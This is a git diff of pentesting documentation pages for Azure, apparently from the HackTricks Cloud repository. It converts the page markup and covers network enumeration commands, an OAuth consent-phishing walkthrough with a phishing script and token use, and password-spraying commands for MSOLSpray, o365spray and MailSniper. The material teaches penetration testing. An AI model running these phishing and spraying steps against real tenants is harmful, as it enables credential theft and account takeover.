-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List Route Tables
 az network route-table list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
@@ -182,10 +170,10 @@ az network route-table list --query "[].{name:name, resourceGroup:resourceGroup,
 # List routes for a table
 az network route-table route list --route-table-name --resource-group --query "[].{name:name, addressPrefix:addressPrefix, nextHopType:nextHopType, nextHopIpAddress:nextHopIpAddress}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List Route Tables
 Get-AzRouteTable
@@ -193,18 +181,18 @@ Get-AzRouteTable
 # List routes for a table
 (Get-AzRouteTable -Name -ResourceGroupName ).Routes
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
+
 ## Azure Private Link
 Azure Private Link is a service in Azure that **enables private access to Azure services** by ensuring that **traffic between your Azure virtual network (VNet) and the service travels entirely within Microsoft's Azure backbone network**. It effectively brings the service into your VNet. This setup enhances security by not exposing the data to the public internet. Private Link can be used with various Azure services, like Azure Storage, Azure SQL Database, and custom services shared via Private Link. It provides a secure way to consume services from within your own VNet or even from different Azure subscriptions.
-{% hint style="danger" %}
-NSGs do not apply to private endpoints, which clearly means that associating an NSG with a subnet that contains the Private Link will have no effect.
-{% endhint %}
+> [!CAUTION]
+> NSGs do not apply to private endpoints, which clearly means that associating an NSG with a subnet that contains the Private Link will have no effect.
 **Example:**
@@ -212,9 +200,9 @@ Consider a scenario where you have an **Azure SQL Database that you want to acce
 ### **Enumeration**
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List Private Link Services
 az network private-link-service list --query "[].{name:name, location:location, resourceGroup:resourceGroup}" -o table
@@ -222,10 +210,10 @@ az network private-link-service list --query "[].{name:name, location:location,
 # List Private Endpoints
 az network private-endpoint list --query "[].{name:name, location:location, resourceGroup:resourceGroup, privateLinkServiceConnections:privateLinkServiceConnections}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List Private Link Services
 Get-AzPrivateLinkService | Select-Object Name, Location, ResourceGroupName
@@ -233,9 +221,9 @@ Get-AzPrivateLinkService | Select-Object Name, Location, ResourceGroupName
 # List Private Endpoints
 Get-AzPrivateEndpoint | Select-Object Name, Location, ResourceGroupName, PrivateEndpointConnections
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ## Azure Service Endpoints
@@ -247,9 +235,9 @@ For instance, an **Azure Storage** account by default is accessible over the pub
 ### **Enumeration**
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List Virtual Networks with Service Endpoints
 az network vnet list --query "[].{name:name, location:location, serviceEndpoints:serviceEndpoints}" -o table
@@ -257,42 +245,42 @@ az network vnet list --query "[].{name:name, location:location, serviceEndpoints
 # List Subnets with Service Endpoints
 az network vnet subnet list --resource-group --vnet-name --query "[].{name:name, serviceEndpoints:serviceEndpoints}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List Virtual Networks with Service Endpoints
 Get-AzVirtualNetwork
 # List Subnets with Service Endpoints
-(Get-AzVirtualNetwork -ResourceGroupName -Name ).Subnets
+(Get-AzVirtualNetwork -ResourceGroupName -Name ).Subnets
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ### Differences Between Service Endpoints and Private Links
 Microsoft recommends using Private Links in the [**docs**](https://learn.microsoft.com/en-us/azure/virtual-network/vnet-integration-for-azure-services#compare-private-endpoints-and-service-endpoints):
-
+
**Service Endpoints:**
-* Traffic from your VNet to the Azure service travels over the Microsoft Azure backbone network, bypassing the public internet.
-* The endpoint is a direct connection to the Azure service and does not provide a private IP for the service within the VNet.
-* The service itself is still accessible via its public endpoint from outside your VNet unless you configure the service firewall to block such traffic.
-* It's a one-to-one relationship between the subnet and the Azure service.
-* Less expensive than Private Links.
+- Traffic from your VNet to the Azure service travels over the Microsoft Azure backbone network, bypassing the public internet.
+- The endpoint is a direct connection to the Azure service and does not provide a private IP for the service within the VNet.
+- The service itself is still accessible via its public endpoint from outside your VNet unless you configure the service firewall to block such traffic.
+- It's a one-to-one relationship between the subnet and the Azure service.
+- Less expensive than Private Links.
 **Private Links:**
-* Private Link maps Azure services into your VNet via a private endpoint, which is a network interface with a private IP address within your VNet.
-* The Azure service is accessed using this private IP address, making it appear as if it's part of your network.
-* Services connected via Private Link can be accessed only from your VNet or connected networks; there's no public internet access to the service.
-* It enables a secure connection to Azure services or your own services hosted in Azure, as well as a connection to services shared by others.
-* It provides more granular access control via a private endpoint in your VNet, as opposed to broader access control at the subnet level with service endpoints.
+- Private Link maps Azure services into your VNet via a private endpoint, which is a network interface with a private IP address within your VNet.
+- The Azure service is accessed using this private IP address, making it appear as if it's part of your network.
+- Services connected via Private Link can be accessed only from your VNet or connected networks; there's no public internet access to the service.
+- It enables a secure connection to Azure services or your own services hosted in Azure, as well as a connection to services shared by others.
+- It provides more granular access control via a private endpoint in your VNet, as opposed to broader access control at the subnet level with service endpoints.
 In summary, while both Service Endpoints and Private Links provide secure connectivity to Azure services, **Private Links offer a higher level of isolation and security by ensuring that services are accessed privately without exposing them to the public internet**. Service Endpoints, on the other hand, are easier to set up for general cases where simple, secure access to Azure services is required without the need for a private IP in the VNet.
@@ -308,9 +296,9 @@ Imagine you have a globally distributed application with users all around the wo
 ### Enumeration
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List Azure Front Door Instances
 az network front-door list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
@@ -318,10 +306,10 @@ az network front-door list --query "[].{name:name, resourceGroup:resourceGroup,
 # List Front Door WAF Policies
 az network front-door waf-policy list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List Azure Front Door Instances
 Get-AzFrontDoor
@@ -329,9 +317,9 @@ Get-AzFrontDoor
 # List Front Door WAF Policies
 Get-AzFrontDoorWafPolicy -Name -ResourceGroupName
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ## Azure Application Gateway and Azure Application Gateway WAF
@@ -344,24 +332,24 @@ And **protect your website from attacks using the WAF capabilities.**
 ### **Enumeration**
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List the Web Application Firewall configurations for your Application Gateways
 az network application-gateway waf-config list --gateway-name --resource-group --query "[].{name:name, firewallMode:firewallMode, ruleSetType:ruleSetType, ruleSetVersion:ruleSetVersion}" -o table
 ```
-{% endcode %}
-{% endtab %}
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # List the Web Application Firewall configurations for your Application Gateways
 (Get-AzApplicationGateway -Name -ResourceGroupName ).WebApplicationFirewallConfiguration
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ## Azure Hub, Spoke & VNet Peering
@@ -370,9 +358,7 @@ az network application-gateway waf-config list --gateway-name -
 **Azure Hub and Spoke** is a network topology used in Azure to manage and organize network traffic. **The "hub" is a central point that controls and routes traffic between different "spokes"**. The hub typically contains shared services such as network virtual appliances (NVAs), Azure VPN Gateway, Azure Firewall, or Azure Bastion. The **"spokes" are VNets that host workloads and connect to the hub using VNet peering**, allowing them to leverage the shared services within the hub. This model promotes clean network layout, reducing complexity by centralizing common services that multiple workloads across different VNets can use.
-{% hint style="danger" %}
-**VNET pairing is non-transitive in Azure**, which means that if spoke 1 is connected to spoke 2 and spoke 2 is connected to spoke 3 then spoke 1 cannot talk directly to spoke 3.
-{% endhint %}
+> [!CAUTION] > **VNET pairing is non-transitive in Azure**, which means that if spoke 1 is connected to spoke 2 and spoke 2 is connected to spoke 3 then spoke 1 cannot talk directly to spoke 3.
 **Example:**
@@ -380,9 +366,9 @@ Imagine a company with separate departments like Sales, HR, and Development, **e
 ### Enumeration
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List all VNets in your subscription
 az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}" -o table
@@ -393,13 +379,13 @@ az network vnet peering list --resource-group --vnet-name -Name ).VirtualNetworkPeerings
@@ -407,9 +393,9 @@ Get-AzVirtualNetwork
 # List Shared Resources (e.g., Azure Firewall) in the Hub
 Get-AzFirewall
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 ## Site-to-Site VPN
@@ -421,9 +407,9 @@ A business with its main office located in New York has an on-premises data cent ### **Enumeration** -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="az cli" }} + ```bash # List VPN Gateways az network vnet-gateway list --query "[].{name:name, location:location, resourceGroup:resourceGroup}" -o table @@ -431,10 +417,10 @@ az network vnet-gateway list --query "[].{name:name, location:location, resource # List VPN Connections az network vpn-connection list --gateway-name --resource-group --query "[].{name:name, connectionType:connectionType, connectionStatus:connectionStatus}" -o table ``` -{% endcode %} -{% endtab %} -{% tab title="PowerShell" %} -{% code overflow="wrap" %} + +{{#endtab }} +{{#tab name="PowerShell" }} + ```powershell # List VPN Gateways Get-AzVirtualNetworkGateway -ResourceGroupName @@ -442,9 +428,9 @@ Get-AzVirtualNetworkGateway -ResourceGroupName # List VPN Connections Get-AzVirtualNetworkGatewayConnection -ResourceGroupName ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ## Azure ExpressRoute 
@@ -456,36 +442,23 @@ A multinational corporation requires a **consistent and reliable connection to i ### **Enumeration** -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="az cli" }} + ```bash # List ExpressRoute Circuits az network express-route list --query "[].{name:name, location:location, resourceGroup:resourceGroup, serviceProviderName:serviceProviderName, peeringLocation:peeringLocation}" -o table ``` -{% endcode %} -{% endtab %} -{% tab title="PowerShell" %} -{% code overflow="wrap" %} + +{{#endtab }} +{{#tab name="PowerShell" }} + ```powershell # List ExpressRoute Circuits Get-AzExpressRouteCircuit ``` -{% endcode %} -{% endtab %} -{% endtabs %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +{{#endtab }} +{{#endtabs }} -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md similarity index 80% rename from pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md rename to src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md index 6fd2ea79d..d9358cdee 100644 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md +++ b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md @@ -1,19 +1,6 @@ # Az - Unauthenticated Enum & Initial Entry -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Azure Tenant @@ -142,11 +129,11 @@ Output: Furthermore it is possible to enumerate availability information about existing users like the following: -* Available -* Away -* DoNotDisturb -* Busy -* Offline +- Available +- Away +- DoNotDisturb +- Busy +- Offline If an **out-of-office message** is configured, it's also possible to retrieve the message using TeamsEnum. If an output file was specified, the out-of-office messages are automatically stored within the JSON file: @@ -192,10 +179,7 @@ Output: }, "isOutOfOffice": true }, - "capabilities": [ - "Audio", - "Video" - ], + "capabilities": ["Audio", "Video"], "availability": "Away", "activity": "Away", "deviceType": "Mobile" 
@@ -247,31 +231,18 @@ Use [**Storage Explorer**](https://azure.microsoft.com/en-us/features/storage-ex ### Phishing -* [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or OAuth App -[Illicit Consent Grant Attack](az-oauth-apps-phishing.md)-) -* [**Device Code Authentication** Phishing](az-device-code-authentication-phishing.md) +- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or OAuth App -[Illicit Consent Grant Attack](az-oauth-apps-phishing.md)-) +- [**Device Code Authentication** Phishing](az-device-code-authentication-phishing.md) ### Password Spraying / Brute-Force -{% content-ref url="az-password-spraying.md" %} -[az-password-spraying.md](az-password-spraying.md) -{% endcontent-ref %} +{{#ref}} +az-password-spraying.md +{{#endref}} ## References -* [https://aadinternals.com/post/just-looking/](https://aadinternals.com/post/just-looking/) -* [https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/](https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/) +- [https://aadinternals.com/post/just-looking/](https://aadinternals.com/post/just-looking/) +- [https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/](https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md new file mode 100644 index 000000000..2b0e09538 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md @@ -0,0 +1,7 @@ +# Az - Device Code Authentication Phishing + +{{#include ../../../banners/hacktricks-training.md}} + +**Check:** [**https://o365blog.com/post/phishing/**](https://o365blog.com/post/phishing/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md similarity index 62% rename from pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md rename to src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md index 540e9a615..765af036d 100644 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md +++ b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md @@ -1,19 +1,6 @@ # Az - OAuth Apps Phishing -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## OAuth App Phishing @@ -23,50 +10,45 @@ Learn & practice GCP Hacking:
+
If users cannot consent, **admins** like `GA`, `Application Administrator` or `Cloud Application` `Administrator` can **consent the applications** that users will be able to use. -Moreover, if users can consent only to apps using **low risk** permissions, these permissions are by default **openid**, **profile**, **email**, **User.Read** and **offline\_access**, although it's possible to **add more** to this list. +Moreover, if users can consent only to apps using **low risk** permissions, these permissions are by default **openid**, **profile**, **email**, **User.Read** and **offline_access**, although it's possible to **add more** to this list. nd if they can consent to all apps, they can consent to all apps. ### 2 Types of attacks -* **Unauthenticated**: From an external account create an application with the **low risk permissions** `User.Read` and `User.ReadBasic.All` for example, phish a user, and you will be able to access directory information. - * This requires the phished user to be **able to accept OAuth apps from external tenant** - * If the phised user is an some admin that can **consent any app with any permissions**, the application could also **request privileged permissions** -* **Authenticated**: Having compromised a principal with enough privileges, **create an application inside the account** and **phish** some **privileged** user which can accept privileged OAuth permissions. - * In this case you can already access the info of the directory, so the permission `User.ReadBasic.All` isn't no longer interesting. 
- * You are probable interested in **permissions that require and admin to grant them**, because raw user cannot give OAuth apps any permission, thats why you need to **phish only those users** (more on which roles/permissions grant this privilege later) +- **Unauthenticated**: From an external account create an application with the **low risk permissions** `User.Read` and `User.ReadBasic.All` for example, phish a user, and you will be able to access directory information. + - This requires the phished user to be **able to accept OAuth apps from external tenant** + - If the phised user is an some admin that can **consent any app with any permissions**, the application could also **request privileged permissions** +- **Authenticated**: Having compromised a principal with enough privileges, **create an application inside the account** and **phish** some **privileged** user which can accept privileged OAuth permissions. + - In this case you can already access the info of the directory, so the permission `User.ReadBasic.All` isn't no longer interesting. + - You are probable interested in **permissions that require and admin to grant them**, because raw user cannot give OAuth apps any permission, thats why you need to **phish only those users** (more on which roles/permissions grant this privilege later) ### Users are allowed to consent Note that you need to execute this command from a user inside the tenant, you cannot find this configuration of a tenant from an external one. The following cli can help you understand the users permissions: -{% code overflow="wrap" %} ```bash az rest --method GET --url "https://graph.microsoft.com/v1.0/policies/authorizationPolicy" ``` -{% endcode %} -* Users can consent to all apps: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForSelf.microsoft-user-default-legacy` then users can to accept every application. 
-* Users can consent to apps from verified publishers or your organization, but only for permissions you select: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users can to accept every application. -* **Disable user consent**: If inside **`permissionGrantPoliciesAssigned`** you can only find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-chat` and `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users cannot consent any. +- Users can consent to all apps: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForSelf.microsoft-user-default-legacy` then users can to accept every application. +- Users can consent to apps from verified publishers or your organization, but only for permissions you select: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users can to accept every application. +- **Disable user consent**: If inside **`permissionGrantPoliciesAssigned`** you can only find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-chat` and `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users cannot consent any. It's possible to find the meaning of each of the commented policies in: -{% code overflow="wrap" %} ```bash az rest --method GET --url "https://graph.microsoft.com/v1.0/policies/permissionGrantPolicies" ``` -{% endcode %} ### **Application Admins** Check users that are considered application admins (can accept new applications): -{% code overflow="wrap" %} ```bash # Get list of roles az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles" 
@@ -80,7 +62,6 @@ az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/1e92 # Get Cloud Applications Administrators az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/0d601d27-7b9c-476f-8134-8e7cd6744f02/members" ``` -{% endcode %} ## **Attack Flow Overview** @@ -96,30 +77,28 @@ The attack involves several steps targeting a generic company. Here's how it mig 1. Register a **new application**. It can be only for the current directory if you are using an user from the attacked directory or for any directory if this is an external attack (like in the following image). 1. Also set the **redirect URI** to the expected URL where you want to receive the code to the get tokens (`http://localhost:8000/callback` by default). -
+
2. Then create an application secret: -
+
3. Select API permissions (e.g. `Mail.Read`, `Notes.Read.All`, `Files.ReadWrite.All`, `User.ReadBasic.All`, `User.Read)` -
+
-4. **Execute the web page (**[**azure\_oauth\_phishing\_example**](https://github.com/carlospolop/azure_oauth_phishing_example)**)** that asks for the permissions: +4. **Execute the web page (**[**azure_oauth_phishing_example**](https://github.com/carlospolop/azure_oauth_phishing_example)**)** that asks for the permissions: -{% code overflow="wrap" %} ```bash # From https://github.com/carlospolop/azure_oauth_phishing_example python3 azure_oauth_phishing_example.py --client-secret --client-id --scopes "email,Files.ReadWrite.All,Mail.Read,Notes.Read.All,offline_access,openid,profile,User.Read" ``` -{% endcode %} 5. **Send the URL to the victim** 1. In this case `http://localhost:8000` 6. **Victims** needs to **accept the prompt:** -
+
7. Use the **access token to access the requested permissions**: @@ -147,8 +126,8 @@ curl -X GET \ ## Other Tools -* [**365-Stealer**](https://github.com/AlteredSecurity/365-Stealer)**:** Check [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer) to learn how to configure it. -* [**O365-Attack-Toolkit**](https://github.com/mdsecactivebreach/o365-attack-toolkit) +- [**365-Stealer**](https://github.com/AlteredSecurity/365-Stealer)**:** Check [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer) to learn how to configure it. +- [**O365-Attack-Toolkit**](https://github.com/mdsecactivebreach/o365-attack-toolkit) ## Post-Exploitation 
@@ -160,26 +139,13 @@ Depending on the requested permissions you might be able to **access different d Check the Applications and Service Principal sections of the page: -{% content-ref url="../az-privilege-escalation/az-entraid-privesc/" %} -[az-entraid-privesc](../az-privilege-escalation/az-entraid-privesc/) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-entraid-privesc/ +{{#endref}} ## References -* [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer) -* [https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/) +- [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer) +- [https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md
new file mode 100644
index 000000000..4b423dca4
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md
@@ -0,0 +1,35 @@
+# Az - Password Spraying
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Password Spray
+
+In **Azure** this can be done against **different API endpoints** like Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, etc.
+
+However, note that this technique is **very noisy** and Blue Team can **easily catch it**. Moreover, **forced password complexity** and the use of **MFA** can make this technique kind of useless.
+
+You can perform a password spray attack with [**MSOLSpray**](https://github.com/dafthack/MSOLSpray)
+
+```powershell
+. .\MSOLSpray\MSOLSpray.ps1
+Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose
+```
+
+Or with [**o365spray**](https://github.com/0xZDH/o365spray)
+
+```bash
+python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com
+```
+
+Or with [**MailSniper**](https://github.com/dafthack/MailSniper)
+
+```powershell
+#OWA
+Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
+#EWS
+Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
+#Gmail
+Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
new file mode 100644
index 000000000..987595e03
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
@@ -0,0 +1,41 @@
+# Az - VMs Unath
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Virtual Machines
+
+For more info about Azure Virtual Machines check:
+
+{{#ref}}
+../az-services/vms/
+{{#endref}}
+
+### Exposed vulnerable service
+
+A network service that is vulnerable to some RCE.
+
+### Public Gallery Images
+
+A public image might have secrets inside of it:
+
+```bash
+# List all community galleries
+az sig list-community --output table
+
+# Search by publisherUri
+az sig list-community --output json --query "[?communityMetadata.publisherUri=='https://3nets.io']"
+```
+
+### Public Extensions
+
+This would be more weird but not impossible. A big company might put an extension with sensitive data inside of it:
+
+```bash
+# It takes some mins to run
+az vm extension image list --output table
+
+# Get extensions by publisher
+az vm extension image list --publisher "Site24x7" --output table
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/README.md b/src/pentesting-cloud/digital-ocean-pentesting/README.md
new file mode 100644
index 000000000..10e077695
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/README.md
